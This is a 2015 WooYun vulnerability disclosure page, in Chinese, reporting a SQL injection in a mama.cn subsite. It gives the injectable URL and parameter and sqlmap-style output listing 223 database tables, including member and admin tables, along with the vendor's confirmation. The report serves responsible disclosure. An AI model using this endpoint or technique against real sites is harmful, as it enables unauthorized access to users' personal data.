妈妈网某分站存在SQL注入一枚 | wooyun-2015-0121636| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121636

漏洞标题：妈妈网某分站存在SQL注入一枚

漏洞作者： bobbi

提交时间：2015-06-19 16:51

修复时间：2015-08-03 17:00

公开时间：2015-08-03 17:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：9

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-19：细节已通知厂商并且等待厂商处理中
2015-06-19：厂商已经确认，细节仅向厂商公开
2015-06-29：细节向核心白帽子及相关领域专家公开
2015-07-09：细节向普通白帽子公开
2015-07-19：细节向实习白帽子公开
2015-08-03：细节向公众公开

简要描述：

其实我是给我儿子买奶粉的 ....

详细说明：

注入：http://zt.mama.cn/x2/index.php?c=aosmith&a=index&page2=1&keyWord2=

[16:16:47] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[16:16:47] [INFO] fetching current database
[16:16:47] [INFO] resumed: zt2
current database:    'zt2'

Database: zt2
[223 tables]
+------------------------------+
| session                      |
| admin_dmz                    |
| annil_category               |
| annil_product                |
| annil_product_love           |
| annil_product_pic            |
| annil_product_total          |
| au_edition                   |
| au_edition_option            |
| au_pic                       |
| au_talk_title                |
| au_thread_list               |
| au_video                     |
| binhaijuncheng               |
| brandstar_userinfo           |
| build_vote                   |
| cache                        |
| comment                      |
| common_col                   |
| common_col_comment           |
| common_col_vote              |
| common_comment               |
| common_district              |
| common_form                  |
| common_items                 |
| common_poll                  |
| communication_answer_option  |
| csbrand_comment              |
| csbrand_option               |
| dmz_register                 |
| dmz_seven                    |
| dmz_weibo                    |
| dmz_weibo_ip                 |
| dmz_weibo_register           |
| dmz_weibo_uid                |
| dmz_weibo_winner             |
| elsker_photo                 |
| elsker_praise                |
| engnice_content              |
| engnice_lucklog              |
| engnice_member               |
| engnice_smilelog             |
| engnice_weeklog              |
| expert_interview             |
| friso_info_tel               |
| geniesse_mini_photo          |
| gulin_ask                    |
| gulin_content                |
| gulin_userinfo               |
| h5_gift                      |
| h5_pic                       |
| hababy_comment               |
| hababy_comment_sum           |
| hababy_sum                   |
| hababy_vote                  |
| heinz_answer                 |
| heinz_info                   |
| heinz_jdticket               |
| heinz_list                   |
| heinz_log                    |
| heinz_lottery                |
| heinz_praise                 |
| heinz_share                  |
| heinz_ticket                 |
| heinz_userinfo               |
| huggies_add                  |
| huggies_challenge            |
| huggies_mini                 |
| huggies_mini5_tryinfo        |
| huggies_mini5_trynum         |
| huggies_mini_two             |
| huggies_minifour_share       |
| huggies_pome_praise          |
| huggies_pome_thread_lucky    |
| huggies_pome_ticket_all      |
| huggies_pome_user_ticket     |
| huggies_pt_userinfo          |
| huggies_t3_code              |
| huggies_t3_share             |
| huggies_wap_thread_list      |
| huggies_wap_thread_post      |
| huggies_wap_userinfo         |
| jinchen                      |
| jinguancheng                 |
| jinxiutianlun                |
| johnson_clicks               |
| johnson_group_breed_question |
| johnson_group_class          |
| johnson_group_dialy          |
| johnson_group_dshare         |
| johnson_group_subject        |
| johnson_group_teach          |
| johnson_group_test           |
| johnson_group_video          |
| johnson_group_vshare         |
| johnson_log                  |
| kasadi_userinfo              |
| kite_apply                   |
| lego_comment                 |
| lego_photo                   |
| lego_praise                  |
| lego_share                   |
| lego_survey                  |
| lego_test                    |
| mday_image                   |
| mday_prize                   |
| mday_prizelog                |
| mday_votelog                 |
| mday_wish                    |
| mday_wishset                 |
| meadjohnson                  |
| meadjohnson_reply            |
| meeting_list                 |
| meilinhu                     |
| member                       |
| member_info                  |
| member_info_bak              |
| member_result                |
| member_stat                  |
| millionmama_content          |
| millionmama_diary            |
| millionmama_diary_20141225   |
| millionmama_diary_20150126   |
| millionmama_diary_20150130   |
| millionmama_diarynums        |
| millionmama_question         |
| millionmama_reply            |
| millionmama_signin           |
| nutrilon_reply               |
| nutrilon_topic               |
| pampers_minitwo_photo        |
| pampers_minitwo_photo_import |
| pampers_minitwo_photo_praise |
| pampers_mp3                  |
| pampers_mp3_invite           |
| pampers_mp3_userinfo         |
| pampers_sleep_declare        |
| pampers_sleep_num            |
| pampers_sleep_test           |
| pampers_star_declare         |
| pampers_star_num             |
| pentair_comment              |
| pg_activity                  |
| pg_community                 |
| pg_focus_activity            |
| pg_member                    |
| pg_member_info               |
| pg_newproduct                |
| pg_qrcode                    |
| pg_survey                    |
| pg_tips                      |
| pg_welfare_notice            |
| pollenin_glue_page           |
| ppw_activity                 |
| ppw_admin_user               |
| ppw_brand                    |
| ppw_chance                   |
| ppw_code                     |
| ppw_media                    |
| ppw_praise                   |
| ppw_prize                    |
| ppw_prizeuser                |
| ppw_product                  |
| ppw_try                      |
| ppw_user                     |
| ppw_userchance               |
| ppw_vote_auto                |
| ppw_vote_error               |
| ppw_votelog                  |
| progeny_list                 |
| queue                        |
| shidaiqingcheng              |
| shopping_orders              |
| shopping_praises             |
| shopping_shares              |
| smith_image                  |
| smith_member                 |
| smith_praise_log             |
| smith_testimony              |
| spring_photo                 |
| supernanny_applyinfo         |
| task_add                     |
| thread_list                  |
| tianjianshangcheng           |
| timeline_praise              |
| timeline_th                  |
| timeline_th_post             |
| tj_beauty_list               |
| tj_beauty_vote               |
| tofer_comment                |
| uc_common_district           |
| unclepop_comment             |
| unclepop_list                |
| unclepop_userinfo            |
| unclepop_vote                |
| wanke_common                 |
| wankeoubo                    |
| wap                          |
| wap_brandlist                |
| wap_common_member            |
| weibo_add                    |
| wfj_list                     |
| womenday_list                |
| yashili_apply                |
| yili_activity                |
| yili_city_post               |
| yili_photo                   |
| yili_post                    |
| yili_praise                  |
| yili_reply                   |
| yili_userinfo                |
| yst_userinfo                 |
| yuanxiao_boil                |
| yuanxiao_make                |
| yuanxiao_share               |
| zaojiao_push                 |
| zhenhu_reply                 |
| zhenhu_test                  |
| zhenhu_wap_test              |
| ztadmin_list                 |
| ztadmin_menu                 |
| zuimei_log                   |
| zuimei_vote                  |
+------------------------------+

漏洞证明：

修复方案：

你懂的

版权声明：转载请注明来源 bobbi@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-06-19 16:58

厂商回复：

谢谢

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121636

漏洞标题：妈妈网某分站存在SQL注入一枚

相关厂商：妈妈网

漏洞作者： bobbi

提交时间：2015-06-19 16:51

修复时间：2015-08-03 17:00

公开时间：2015-08-03 17:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：9

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 bobbi@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121636

漏洞标题：妈妈网某分站存在SQL注入一枚

相关厂商：妈妈网

漏洞作者： bobbi

提交时间：2015-06-19 16:51

修复时间：2015-08-03 17:00

公开时间：2015-08-03 17:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：9

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121636"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 bobbi@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：